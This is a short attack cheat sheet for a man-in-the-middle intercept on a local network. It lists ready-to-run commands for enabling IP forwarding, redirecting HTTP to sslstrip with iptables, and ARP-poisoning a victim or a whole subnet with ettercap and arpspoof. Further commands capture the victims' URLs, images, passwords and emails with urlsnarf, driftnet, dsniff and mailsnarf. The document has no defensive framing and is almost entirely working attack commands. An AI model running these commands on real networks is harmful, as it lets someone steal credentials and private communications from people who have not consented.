MiTM

1. Configure ip forwarding on attacker host

echo “1” > /proc/sys/net/ipv4/ip_forward

2. Redirection of http traffic to sslstrip
2a. iptables -t nat -A PREROUTING -i eth0 -p tcp –destination-port 80 -j REDIRECT –to-port 8000
2b. iptables-save

3. SSLStrip
sslstrip -k -l 8000 -w encrypted.txt

4. Ettercap
ettercap -TqM arp:remote <victim_ip> <gateway_ip>

5 Arpspoof
5a. Single host > arpspoof -i eth0 -t <victim_ip> <gateway_ip>
5b. Whole net > arpspoof -i eth0 <gateway_ip>

5. Urlsnarf – capture http
urlsnarf -i eth0

6. Driftnet – capture images
driftnet -i eth0

7. Dsniff – capture passwords
dsniff -i eth0 -w plaintext.txt

8. Mailsnarf – capture emails
mailsnarf -i eth0